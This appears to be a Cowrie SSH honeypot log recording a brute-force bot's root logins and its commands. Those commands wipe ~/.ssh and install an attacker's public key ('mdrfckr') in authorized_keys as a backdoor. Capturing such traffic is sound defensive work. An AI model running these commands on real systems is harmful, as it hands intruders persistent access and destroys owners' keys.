{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:23:30.492003Z","src_ip":"212.227.235.229","session":"304306e3b247"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:23:30.725316Z","src_ip":"212.227.235.229","session":"304306e3b247"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T18:23:31.697063Z","src_ip":"212.227.235.229","session":"304306e3b247"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:23:32.931272Z","src_ip":"212.227.235.229","session":"304306e3b247"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34460,"dst_ip":"1.2.3.4","dst_port":22,"session":"285426735d56","protocol":"ssh","message":"New connection: 212.227.235.229:34460 (1.2.3.4:22) [session: 285426735d56]","sensor":"my-vps","timestamp":"2025-08-28T18:23:33.153365Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:23:33.154289Z","src_ip":"212.227.235.229","session":"285426735d56"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:23:33.380645Z","src_ip":"212.227.235.229","session":"285426735d56"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:23:34.374633Z","src_ip":"212.227.235.229","session":"285426735d56"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:23:34.603219Z","src_ip":"212.227.235.229","session":"285426735d56"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:23:34.606799Z","src_ip":"212.227.235.229","session":"bf85e43c4c45"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40822,"dst_ip":"1.2.3.4","dst_port":22,"session":"d5013720bf7b","protocol":"ssh","message":"New connection: 212.227.235.229:40822 (1.2.3.4:22) [session: d5013720bf7b]","sensor":"my-vps","timestamp":"2025-08-28T18:23:59.503685Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:23:59.504363Z","src_ip":"212.227.235.229","session":"d5013720bf7b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:23:59.676033Z","src_ip":"212.227.235.229","session":"d5013720bf7b"}
{"eventid":"cowrie.login.success","username":"root","password":"135790","message":"login attempt [root/135790] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:24:00.404773Z","src_ip":"212.227.235.229","session":"d5013720bf7b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T18:24:00.767718Z","src_ip":"212.227.235.229","session":"d5013720bf7b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T18:24:00.768532Z","src_ip":"212.227.235.229","session":"d5013720bf7b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T18:24:00.769379Z","src_ip":"212.227.235.229","session":"d5013720bf7b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:24:00.943594Z","src_ip":"212.227.235.229","session":"d5013720bf7b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T18:24:01.350744Z","src_ip":"212.227.235.229","session":"d5013720bf7b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T18:24:01.351531Z","src_ip":"212.227.235.229","session":"d5013720bf7b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T18:24:01.526387Z","src_ip":"212.227.235.229","session":"d5013720bf7b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:24:01.527564Z","src_ip":"212.227.235.229","session":"d5013720bf7b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36294,"dst_ip":"1.2.3.4","dst_port":22,"session":"ecfed446d030","protocol":"ssh","message":"New connection: 212.227.235.229:36294 (1.2.3.4:22) [session: ecfed446d030]","sensor":"my-vps","timestamp":"2025-08-28T18:24:01.696012Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:24:01.697447Z","src_ip":"212.227.235.229","session":"ecfed446d030"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:24:01.868792Z","src_ip":"212.227.235.229","session":"ecfed446d030"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T18:24:02.594301Z","src_ip":"212.227.235.229","session":"ecfed446d030"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:24:03.768879Z","src_ip":"212.227.235.229","session":"ecfed446d030"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36310,"dst_ip":"1.2.3.4","dst_port":22,"session":"bfc1bfa4f66d","protocol":"ssh","message":"New connection: 212.227.235.229:36310 (1.2.3.4:22) [session: bfc1bfa4f66d]","sensor":"my-vps","timestamp":"2025-08-28T18:24:03.940394Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:24:03.941083Z","src_ip":"212.227.235.229","session":"bfc1bfa4f66d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:24:04.113048Z","src_ip":"212.227.235.229","session":"bfc1bfa4f66d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:24:04.843581Z","src_ip":"212.227.235.229","session":"bfc1bfa4f66d"}
{"eventid":"cowrie.session.closed","duration":"5.5","message":"Connection lost after 5.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:24:05.017124Z","src_ip":"212.227.235.229","session":"d5013720bf7b"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:24:05.017988Z","src_ip":"212.227.235.229","session":"bfc1bfa4f66d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55968,"dst_ip":"1.2.3.4","dst_port":22,"session":"e910497c9548","protocol":"ssh","message":"New connection: 212.227.235.229:55968 (1.2.3.4:22) [session: e910497c9548]","sensor":"my-vps","timestamp":"2025-08-28T18:24:24.795615Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:24:24.796510Z","src_ip":"212.227.235.229","session":"e910497c9548"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:24:25.055625Z","src_ip":"212.227.235.229","session":"e910497c9548"}
{"eventid":"cowrie.login.success","username":"root","password":"abcd2020","message":"login attempt [root/abcd2020] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:24:26.139043Z","src_ip":"212.227.235.229","session":"e910497c9548"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T18:24:26.678425Z","src_ip":"212.227.235.229","session":"e910497c9548"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T18:24:26.679159Z","src_ip":"212.227.235.229","session":"e910497c9548"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T18:24:26.680000Z","src_ip":"212.227.235.229","session":"e910497c9548"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:24:26.956501Z","src_ip":"212.227.235.229","session":"e910497c9548"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T18:24:27.535191Z","src_ip":"212.227.235.229","session":"e910497c9548"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T18:24:27.536123Z","src_ip":"212.227.235.229","session":"e910497c9548"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T18:24:27.802543Z","src_ip":"212.227.235.229","session":"e910497c9548"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:24:27.803631Z","src_ip":"212.227.235.229","session":"e910497c9548"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55976,"dst_ip":"1.2.3.4","dst_port":22,"session":"6abbf214380e","protocol":"ssh","message":"New connection: 212.227.235.229:55976 (1.2.3.4:22) [session: 6abbf214380e]","sensor":"my-vps","timestamp":"2025-08-28T18:24:28.072686Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:24:28.073356Z","src_ip":"212.227.235.229","session":"6abbf214380e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:24:28.343764Z","src_ip":"212.227.235.229","session":"6abbf214380e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T18:24:29.463302Z","src_ip":"212.227.235.229","session":"6abbf214380e"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:24:30.735316Z","src_ip":"212.227.235.229","session":"6abbf214380e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53726,"dst_ip":"1.2.3.4","dst_port":22,"session":"4b3253e34225","protocol":"ssh","message":"New connection: 212.227.235.229:53726 (1.2.3.4:22) [session: 4b3253e34225]","sensor":"my-vps","timestamp":"2025-08-28T18:24:30.981321Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:24:30.982089Z","src_ip":"212.227.235.229","session":"4b3253e34225"}
